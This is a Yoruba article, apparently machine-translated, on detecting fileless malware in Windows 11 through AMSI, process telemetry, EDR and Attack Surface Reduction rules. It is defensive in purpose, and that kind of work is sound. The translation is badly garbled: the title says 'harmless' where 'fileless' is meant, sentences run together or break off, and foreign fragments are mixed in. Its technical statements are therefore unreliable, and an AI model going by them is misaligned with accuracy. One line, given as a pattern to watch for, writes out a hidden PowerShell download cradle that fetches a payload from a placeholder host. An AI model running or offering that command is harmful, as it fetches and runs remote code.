Bii o ṣe le rii malware ti ko ni eewu ni Windows 11

¿Bii o ṣe le rii malware ti ko ni faili ti o lewu? Iṣẹ ikọlu ti ko ni faili ti dagba ni pataki, ati lati jẹ ki ọrọ buru si, Windows 11 kii ṣe ajesaraỌna yii kọja disiki naa ati ki o gbẹkẹle iranti ati awọn irinṣẹ eto ẹtọ; ti o ni idi Ibuwọlu-orisun antivirus awọn eto ija. Ti o ba n wa ọna ti o gbẹkẹle lati rii, idahun wa ni apapọ telemetry, itupalẹ ihuwasi, ati awọn idari Windows.

Ninu ilolupo eda ti o wa lọwọlọwọ, awọn ipolongo ti o ilokulo PowerShell, WMI, tabi Mshta wa papọ pẹlu awọn ilana imudara diẹ sii gẹgẹbi awọn abẹrẹ iranti, itẹramọṣẹ “laisi fọwọkan” disk, ati paapaa famuwia abuseBọtini naa ni lati loye maapu irokeke, awọn ipele ikọlu, ati awọn ami wo ti wọn fi silẹ paapaa nigbati ohun gbogbo ba ṣẹlẹ laarin Ramu.

Kini malware ti ko ni faili ati kilode ti o jẹ ibakcdun ni Windows 11?

Nigba ti a ba sọrọ nipa awọn irokeke "aini faili", a n tọka si koodu irira pe O ko nilo lati beebe titun executables ninu eto faili lati ṣiṣẹ. Nigbagbogbo o jẹ itasi sinu awọn ilana ṣiṣe ati ṣiṣe ni Ramu, da lori awọn onitumọ ati awọn alakomeji ti Microsoft fowo si (fun apẹẹrẹ, PowerShell, WMI, rundll32, mshtaEyi dinku ifẹsẹtẹ rẹ ati gba ọ laaye lati fori awọn ẹrọ ti o wa awọn faili ifura nikan.

Paapaa awọn iwe aṣẹ ọfiisi tabi awọn PDF ti o lo awọn ailagbara lati ṣe ifilọlẹ awọn aṣẹ ni a gba si apakan ti iṣẹlẹ, nitori mu ṣiṣẹ ni iranti lai nlọ wulo binaries fun onínọmbà. ilokulo ti Makiro ati DDE Ni Office, niwon koodu naa nṣiṣẹ ni awọn ilana ti o tọ bi WinWord.

Awọn ikọlu darapọ imọ-ẹrọ awujọ (ararẹ, awọn ọna asopọ àwúrúju) pẹlu awọn ẹgẹ imọ-ẹrọ: tẹ olumulo bẹrẹ ẹwọn kan ninu eyiti iwe afọwọkọ kan ṣe igbasilẹ ati ṣiṣe fifuye ipari ni iranti, yago fun nlọ kan wa kakiri lori disk. Awọn ibi-afẹde naa wa lati jija data si ipaniyan ransomware, si ipalọlọ ita ita.

Awọn oriṣi nipasẹ ifẹsẹtẹ ninu eto: lati 'funfun' si awọn arabara

Lati yago fun awọn imọran iruju, o ṣe iranlọwọ lati ya awọn irokeke sọtọ nipasẹ iwọn ibaraenisepo wọn pẹlu eto faili naa. Isọri yii ṣe alaye ohun ti o tẹsiwaju, nibo ni koodu n gbe, ati awọn ami wo ni o fi silẹ?.

Iru I: ko si iṣẹ ṣiṣe faili

Ni kikun fileless malware ko ohunkohun si disk. A Ayebaye apẹẹrẹ ni a nilokulo a ailagbara nẹtiwọki (bii fekito EternalBlue pada ni ọjọ) lati ṣe imuse ile ẹhin ti ngbe ni iranti ekuro (awọn ọran bii DoublePulsar). Nibi, ohun gbogbo ṣẹlẹ ni Ramu ati pe ko si awọn ohun-iṣere ninu eto faili naa.

Aṣayan miiran ni lati doti awọn famuwia ti irinše: BIOS / UEFI, nẹtiwọki alamuuṣẹ, USB pẹẹpẹẹpẹ (BadUSB-Iru imuposi) tabi paapa Sipiyu subsystems. Wọn tẹsiwaju nipasẹ awọn atunbẹrẹ ati awọn atunto, pẹlu iṣoro ti a ṣafikun pe Awọn ọja diẹ ṣe ayẹwo famuwiaIwọnyi jẹ awọn ikọlu idiju, loorekoore, ṣugbọn eewu nitori lilọ ni ifura ati agbara wọn.

Iru II: Iṣẹ ṣiṣe ifipamọ aiṣe-taara

Nibi, malware ko “fi silẹ” ṣiṣe ti ara rẹ, ṣugbọn nlo awọn apoti iṣakoso ti eto ti o ti fipamọ ni pataki bi awọn faili. Fun apẹẹrẹ, backdoors ti o ọgbin Àwọn àṣẹ PowerShell ni ibi ipamọ WMI ati ṣe okunfa ipaniyan rẹ pẹlu awọn asẹ iṣẹlẹ. O ṣee ṣe lati fi sii lati laini aṣẹ laisi sisọ awọn alakomeji silẹ, ṣugbọn ibi ipamọ WMI wa lori disiki gẹgẹbi ibi ipamọ data abẹ, ti o jẹ ki o ṣoro lati nu laisi ni ipa lori eto naa.

Lati oju iwoye ti o wulo wọn ni a kà wọn si alaini faili, nitori pe eiyan yẹn (WMI, Iforukọsilẹ, ati bẹbẹ lọ) O ti wa ni ko kan Ayebaye-ri executable Ati pe afọmọ rẹ kii ṣe ohun kekere. Abajade: itẹramọṣẹ stealthy pẹlu itọpa “ibile” kekere.

Iru III: Nilo awọn faili lati ṣiṣẹ

Diẹ ninu awọn igba ṣetọju a 'fileless' itẹramọṣẹ Ni ipele ọgbọn, wọn nilo okunfa orisun-faili. Apẹẹrẹ aṣoju jẹ Kovter: o forukọsilẹ ọrọ-ọrọ ikarahun kan fun itẹsiwaju laileto; nigbati faili kan pẹlu itẹsiwaju yẹn ba ṣii, iwe afọwọkọ kekere kan ti nlo mshta.exe ti ṣe ifilọlẹ, eyiti o tun ṣe okun irira lati Iforukọsilẹ.

Ẹtan naa ni pe awọn faili “bait” wọnyi pẹlu awọn amugbooro laileto ko ni fifuye isanwo itupalẹ, ati pupọ julọ koodu naa wa ninu Àkọsílẹ̀ (miiran eiyan). Ti o ni idi ti won ti wa ni tito lẹšẹšẹ bi fileless ni ikolu, ani tilẹ soro ni muna ti won dale lori ọkan tabi diẹ ẹ sii disk artifacts bi a okunfa.

Vectors ati 'ogun' ti ikolu: ibi ti o ti nwọ ati ibi ti o tọju

Lati mu iṣawari dara si, o ṣe pataki lati ṣe maapu aaye titẹsi ati ogun ti akoran naa. Irisi yii ṣe iranlọwọ lati ṣe apẹrẹ pato idari Ṣe akọkọ telemetry yẹ.

Àwọn ìlòkulò

• orisun faili (Iru III): Awọn iwe aṣẹ, awọn iṣẹ ṣiṣe, awọn faili Flash/Java, tabi awọn faili LNK le lo ẹrọ aṣawakiri tabi ẹrọ ti o ṣe ilana wọn lati gbe koodu shell sinu iranti. Ni igba akọkọ ti fekito ni a faili, ṣugbọn awọn payload ajo to Ramu.
• Nẹtiwọọki-orisun (Iru I): Apo ti n lo ailagbara kan (fun apẹẹrẹ, ni SMB) ṣe aṣeyọri ipaniyan ni ilẹ olumulo tabi ekuro. WannaCry gbakiki ọna yii. Taara fifuye iranti lai titun faili.

Hardware

• Àwọn ẹ̀rọ (Iru I): Disk tabi famuwia kaadi nẹtiwọki le yipada ati ṣafihan koodu. O nira lati ṣayẹwo ati duro ni ita OS.
• Sipiyu ati isakoso subsystems (Iru I): Awọn imọ-ẹrọ bii Intel's ME/AMT ti ṣe afihan awọn ipa ọna si Nẹtiwọki ati ipaniyan ni ita OSO kọlu ni ipele kekere pupọ, pẹlu lilọ ni ifura to gaju.
• USB (Iru I): BadUSB ngbanilaaye lati ṣe atunto kọnputa USB kan lati ṣe afarawe keyboard tabi NIC ati ifilọlẹ awọn aṣẹ tabi ṣe itọsọna ijabọ.
• BIOS/UEFI (Iru I): atunṣe famuwia irira (awọn ọran bii Mebromi) ti o ṣiṣẹ ṣaaju awọn bata bata Windows.
• Hypervisor (Iru I): Ṣiṣe imuṣẹ mini-hypervisor labẹ OS lati fi wiwa rẹ pamọ. Toje, ṣugbọn ti ṣe akiyesi tẹlẹ ni irisi rootkits hypervisor.

Ipaniyan ati abẹrẹ

• orisun faili (Iru III): EXE/DLL/LNK tabi awọn iṣẹ ṣiṣe ti o ṣe ifilọlẹ awọn abẹrẹ sinu awọn ilana ti o tọ.
• Àwọn Macros (Iru III): VBA ni Office le pinnu ati ṣiṣẹ awọn ẹru isanwo, pẹlu ransomware ni kikun, pẹlu aṣẹ olumulo nipasẹ ẹtan.
• Àwọn ìwé àfọwọ́kọ (Iru II): PowerShell, VBScript tabi JScript lati faili, laini aṣẹ, awọn iṣẹ, Iforukọ tabi WMIOlukọni le tẹ iwe afọwọkọ ni igba jijin lai fi ọwọ kan disiki naa.
• Igbasilẹ bata (MBR/Boot) (Iru II): Awọn idile bii Petya ṣe atunkọ eka bata lati gba iṣakoso ni ibẹrẹ. O wa ni ita ti eto faili, ṣugbọn wiwọle si OS ati awọn solusan igbalode ti o le mu pada.

Bii awọn ikọlu alaini faili ṣe nṣiṣẹ: awọn ipele ati awọn ifihan agbara

Botilẹjẹpe wọn ko fi awọn faili ti o le ṣiṣẹ silẹ, awọn ipolongo naa tẹle ilana kannaa. Agbọye wọn gba laaye fun ibojuwo. awọn iṣẹlẹ ati awọn ibatan laarin awọn ilana ti o fi aami kan silẹ.

• Wiwọle akọkọAwọn ikọlu ararẹ nipa lilo awọn ọna asopọ tabi awọn asomọ, awọn oju opo wẹẹbu ti o gbogun, tabi awọn iwe-ẹri jile. Ọpọlọpọ awọn ẹwọn bẹrẹ pẹlu iwe Office ti o nfa aṣẹ kan PowerShell.
• Itẹramọṣẹ: awọn ile ẹhin nipasẹ WMI (awọn asẹ ati awọn ṣiṣe alabapin), Awọn bọtini ipaniyan iforukọsilẹ tabi awọn iṣẹ ṣiṣe eto ti o tun bẹrẹ awọn iwe afọwọkọ laisi faili irira titun.
• ExfiltrationNi kete ti o ti gba alaye naa, o ti firanṣẹ lati inu nẹtiwọọki nipa lilo awọn ilana igbẹkẹle (awọn aṣawakiri, PowerShell, bitsadmin) lati dapọ awọn ijabọ.

Yi Àpẹẹrẹ jẹ paapa insidious nitori awọn kolu ifi Wọn farapamọ ni deede: awọn ariyanjiyan laini aṣẹ, ṣiṣe ọna ṣiṣe, awọn asopọ ti njade laiṣe, tabi iraye si awọn API abẹrẹ.

Awọn ilana ti o wọpọ: lati iranti si gbigbasilẹ

Awọn olukopa gbekele lori a ibiti o ti awọn ọna ti o je ki lilọ ni ifura. O ṣe iranlọwọ lati mọ awọn ti o wọpọ julọ lati mu iṣawari ti o munadoko ṣiṣẹ.

• Olugbe ni iranti: Ikojọpọ awọn isanwo si aaye ti ilana ti o gbẹkẹle ti o duro de imuṣiṣẹ. rootkits ati ìkọ Ninu ekuro, wọn gbe ipele ti ipamọ soke.
• Itẹramọṣẹ ni IforukọsilẹṢafipamọ awọn blọọgi ti paroko ni awọn bọtini ki o sọ wọn di omi lati inu ifilọlẹ ti o tọ (mshta, rundll32, wscript). Insitola ephemeral le ṣe iparun funrararẹ lati dinku ifẹsẹtẹ rẹ.
• Aṣiri ẹríLilo awọn orukọ olumulo ati awọn ọrọ igbaniwọle ji, ikọlu naa ṣiṣẹ awọn ikarahun latọna jijin ati awọn irugbin ipalọlọ wiwọle ni iforukọsilẹ tabi WMI.
• 'Fileless' RansomwareÌsekóòdù ati C2 ibaraẹnisọrọ ti wa ni orchestrated lati Ramu, atehinwa anfani fun erin titi ti bibajẹ jẹ han.
• Awọn ohun elo iṣẹ: awọn ẹwọn adaṣe ti o rii awọn ailagbara ati mu awọn ẹru isanwo iranti-nikan ṣiṣẹ lẹhin ti olumulo tẹ.
• Awọn iwe aṣẹ pẹlu koodu: macros ati awọn ilana bii DDE ti o nfa awọn aṣẹ laisi fifipamọ awọn iṣẹ ṣiṣe si disk.

Awọn ijinlẹ ile-iṣẹ ti ṣe afihan awọn giga julọ akiyesi: ni akoko kan ti 2018, a ilosoke ti o ju 90% ni orisun iwe afọwọkọ ati awọn ikọlu pq PowerShell, ami kan pe fekito jẹ ayanfẹ fun imunadoko rẹ.

Ipenija fun awọn ile-iṣẹ ati awọn olupese: kilode ti idinamọ ko to

Yoo jẹ idanwo lati mu PowerShell kuro tabi gbesele macros lailai, ṣugbọn Iwọ yoo fọ isẹ naaPowerShell jẹ ọwọn ti iṣakoso ode oni ati Office jẹ pataki ni iṣowo; didi afọju nigbagbogbo ko ṣee ṣe.

Pẹlupẹlu, awọn ọna wa lati fori awọn idari ipilẹ: nṣiṣẹ PowerShell nipasẹ awọn DLLs ati rundll32, awọn iwe afọwọkọ apoti sinu EXEs, Mu ẹda PowerShell tirẹ wa tabi paapaa tọju awọn iwe afọwọkọ ni awọn aworan ki o jade wọn sinu iranti. Nitorinaa, aabo ko le da lori kiko aye ti awọn irinṣẹ.

Aṣiṣe miiran ti o wọpọ ni fifi gbogbo ipinnu si awọsanma: ti aṣoju ba ni lati duro fun esi lati ọdọ olupin naa, O padanu idena akoko gidiTelemetry data le ti wa ni Àwọn lati bùkún alaye, ṣugbọn awọn Idinku gbọdọ waye ni aaye ipari.

Bii o ṣe le rii malware ti ko ni faili ni Windows 11: telemetry ati ihuwasi

Awọn ti gba nwon.Mirza ni bojuto awọn ilana ati irantiKo awọn faili. Awọn ihuwasi irira jẹ iduroṣinṣin diẹ sii ju awọn fọọmu ti faili kan gba, ṣiṣe wọn jẹ apẹrẹ fun awọn ẹrọ idena.

• AMSI (Atoju Iwoye Antimalware)O ṣe idiwọ PowerShell, VBScript, tabi awọn iwe afọwọkọ JScript paapaa nigba ti wọn ṣe ni agbara ni iranti. O tayọ fun yiya awọn gbolohun ọrọ ti o ni idiwọ ṣaaju ipaniyan.
• Abojuto ilana: bẹrẹ / pari, PID, awọn obi ati awọn ọmọde, awọn ipa-ọna, pipaṣẹ ila ati hashes, pẹlu awọn igi ipaniyan lati loye itan kikun naa.
• Iṣiro iranti: erin ti abẹrẹ, reflective tabi PE èyà lai kàn disk, ati atunyẹwo ti dani executable awọn ẹkun ni.
• Idaabobo aladani Starter: iṣakoso ati mimu-pada sipo ti MBR / EFI ni ọran ti ifọwọyi.

Ninu ilolupo Microsoft, Olugbeja fun Endpoint darapọ AMSI, iwa monitoringṢiṣayẹwo iranti ati ẹkọ ẹrọ ti o da lori awọsanma ni a lo lati ṣe iwọn awọn awari lodi si awọn iyatọ tuntun tabi ti o pa. Awọn olutaja miiran gba awọn isunmọ kanna pẹlu awọn ẹrọ olugbe ekuro.

Apeere ojulowo ti ibamu: lati iwe si PowerShell

Fojuinu pq kan nibiti Outlook ṣe igbasilẹ asomọ kan, Ọrọ ṣi iwe-ipamọ naa, akoonu ti nṣiṣe lọwọ ti ṣiṣẹ, ati pe PowerShell ti ṣe ifilọlẹ pẹlu awọn aye ifura. Ti o tọ telemetry yoo fi awọn ìlà àṣẹ (fun apẹẹrẹ, ExecutionPolicy Bypass, window ti o farapamọ), sisopọ si agbegbe ti a ko gbẹkẹle ati ṣiṣẹda ilana ọmọ ti o fi ara rẹ sii ni AppData.

Aṣoju pẹlu ipo agbegbe ni agbara lati da ati ki o ẹnjinia iṣẹ irira laisi kikọlu afọwọṣe, ni afikun si ifitonileti SIEM tabi nipasẹ imeeli/SMS. Diẹ ninu awọn ọja ṣafikun Layer fa idi root (awọn awoṣe iru-StoryLine), eyiti kii ṣe si ilana ti o han (Outlook/Ọrọ), ṣugbọn si okùn irira kikun ati awọn oniwe-Oti lati comprehensively nu soke awọn eto.

Ilana aṣẹ aṣoju lati ṣọra le dabi eyi: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic kii ṣe okun gangan, ṣugbọn ṣeto awọn ifihan agbara: fori eto imulo, ferese ti o farapamọ, igbasilẹ mimọ, ati ipaniyan inu-iranti.

AMSI, opo gigun ti epo ati ipa ti oṣere kọọkan: lati aaye ipari si SOC

Ni ikọja Yaworan iwe afọwọkọ, ile-iṣẹ faaji ti o lagbara kan ṣe agbekalẹ awọn igbesẹ ti o rọrun iwadii ati idahun. Awọn ẹri diẹ sii ṣaaju ṣiṣe fifuye, dara julọ., ó dára jù bẹ́ẹ̀ lọ.

• kikọlu akosileAMSI ṣe igbasilẹ akoonu naa (paapaa ti o ba jẹ ipilẹṣẹ lori fifo) fun aimi ati itupalẹ agbara ni opo gigun ti epo malware kan.
• Awọn iṣẹlẹ ilanaAwọn PIDs, awọn alakomeji, hashes, awọn ipa-ọna, ati awọn data miiran ni a gba. awọn ariyanjiyan, Igbekale awọn igi ilana ti o yori si ik ​​fifuye.
• Wiwa ati iroyinAwọn iṣawari ti han lori console ọja ati firanṣẹ si awọn iru ẹrọ nẹtiwọki (NDR) fun iworan ipolongo.
• Awọn iṣeduro olumuloPaapa ti o ba jẹ itasi iwe afọwọkọ sinu iranti, ilana naa AMSI intercepts o ni ibamu awọn ẹya ti Windows.
• Awọn agbara alakoso: iṣeto eto imulo lati jẹki ayewo iwe afọwọkọ, ìdènà ihuwasi-orisun ati ṣiṣẹda awọn ijabọ lati console.
• SOC iṣẹ: isediwon ti onisebaye (VM UUID, OS version, akosile iru, initiator ilana ati awọn oniwe-obi, hashes ati pipaṣẹ ila) lati tun awọn itan ati gbe awọn ofin ọjọ́ iwájú.

Nigba ti Syeed faye gba tajasita awọn ifipamọ iranti Ti o ni nkan ṣe pẹlu ipaniyan, awọn oniwadi le ṣe agbekalẹ awọn iwadii tuntun ati mu aabo pọ si lodi si awọn iyatọ ti o jọra.

Awọn igbese to wulo ni Windows 11: idena ati isode

Ni afikun si nini EDR pẹlu ayewo iranti ati AMSI, Windows 11 jẹ ki o sunmọ awọn aaye ikọlu ati ilọsiwaju hihan pẹlu abinibi idari.

• Iforukọsilẹ ati awọn ihamọ ni PowerShellṢiṣẹ Dinaki iwe afọwọkọ ati titẹ sii Module, lo awọn ipo ihamọ nibiti o ti ṣee ṣe, ati ṣakoso lilo ti Fori / farasin.
• Attack dada Idinku (ASR) Ofin: ohun amorindun awọn ifilọlẹ iwe afọwọkọ nipa Office lakọkọ ati WMI ilokulo/ PSExec nigba ti ko ba nilo.
• Office Makiro imulo: mu ṣiṣẹ nipasẹ aiyipada, iforukọsilẹ Makiro inu ati awọn atokọ igbẹkẹle to muna; diigi julọ DDE óę.
• WMI Ayẹwo ati Iforukọsilẹ: ṣe abojuto awọn ṣiṣe alabapin iṣẹlẹ ati awọn bọtini ipaniyan adaṣe (Run, RunOnce, Winlogon), ati ṣiṣẹda iṣẹ ṣiṣe se eto.
• Idaabobo ibẹrẹ: activates Secure Boot, sọwedowo MBR/EFI iyege ati sooto wipe nibẹ ni o wa ko si awọn iyipada ni ibẹrẹ.
• Patching ati lile: tilekun awọn ailagbara lilo ninu awọn aṣawakiri, awọn paati Office, ati awọn iṣẹ nẹtiwọọki.
• imo: ṣe ikẹkọ awọn olumulo ati awọn ẹgbẹ imọ-ẹrọ ni aṣiri-ararẹ ati awọn ifihan agbara ti covert executions.

Fun ọdẹ, idojukọ lori awọn ibeere nipa: ṣiṣẹda awọn ilana nipasẹ Office si ọna PowerShell/MSHTA, awọn ariyanjiyan pẹlu downloadstring / downloadfileAwọn iwe afọwọkọ pẹlu obfuscation ti o han gbangba, awọn abẹrẹ afihan, ati awọn nẹtiwọọki ti njade si awọn TLDs ifura. Itọkasi awọn ifihan agbara wọnyi pẹlu orukọ rere ati igbohunsafẹfẹ lati dinku ariwo.

Kini engine kọọkan le rii loni?

Awọn ojutu ile-iṣẹ Microsoft darapọ AMSI, awọn atupale ihuwasi, ṣayẹwo iranti ati aabo aladani bata, pẹlu awọn awoṣe ML ti o da lori awọsanma lati ṣe iwọn lodi si awọn irokeke ti n yọ jade. Awọn olutaja miiran ṣe ibojuwo ipele-kernel lati ṣe iyatọ irira lati sọfitiwia alaiṣe pẹlu yiyi pada laifọwọyi ti awọn ayipada.

An ona da lori awọn itan ipaniyan O gba ọ laaye lati ṣe idanimọ idi root (fun apẹẹrẹ, asomọ Outlook ti o nfa pq kan) ati dinku gbogbo igi: awọn iwe afọwọkọ, awọn bọtini, awọn iṣẹ ṣiṣe, ati awọn alakomeji agbedemeji, yago fun diduro lori aami aisan ti o han.

Awọn aṣiṣe ti o wọpọ ati bi o ṣe le yago fun wọn

Dinamọ PowerShell laisi ero iṣakoso yiyan kii ṣe iwulo nikan, ṣugbọn awọn tun wa awọn ọna lati pe ni aiṣe-taaraKanna kan si awọn macros: boya o ṣakoso wọn pẹlu awọn eto imulo ati awọn ibuwọlu, tabi iṣowo naa yoo jiya. O dara lati dojukọ telemetry ati awọn ofin ihuwasi.

Aṣiṣe miiran ti o wọpọ ni gbigbagbọ pe awọn ohun elo iwe-funfun yanju ohun gbogbo: imọ-ẹrọ ti ko ni faili da lori eyi. gbẹkẹle appsIṣakoso yẹ ki o ṣe akiyesi ohun ti wọn ṣe ati bi wọn ṣe ni ibatan, kii ṣe boya wọn gba laaye nikan.

Pẹlu gbogbo eyi ti o wa loke, malware ti ko ni faili dẹkun lati jẹ “iwin” nigbati o ṣe atẹle ohun ti o ṣe pataki: ihuwasi, iranti, ati awọn ipilẹṣẹ ti kọọkan ipaniyan. Apapọ AMSI, telemetry ilana ọlọrọ, abinibi Windows 11 awọn idari, ati Layer EDR pẹlu itupalẹ ihuwasi fun ọ ni anfani. Ṣafikun awọn eto imulo ojulowo idogba fun macros ati PowerShell, WMI/Ṣiṣayẹwo iforukọsilẹ, ati ọdẹ ti o ṣaju awọn laini aṣẹ ati awọn igi ilana, ati pe o ni aabo ti o ge awọn ẹwọn wọnyi ṣaaju ki wọn to dun.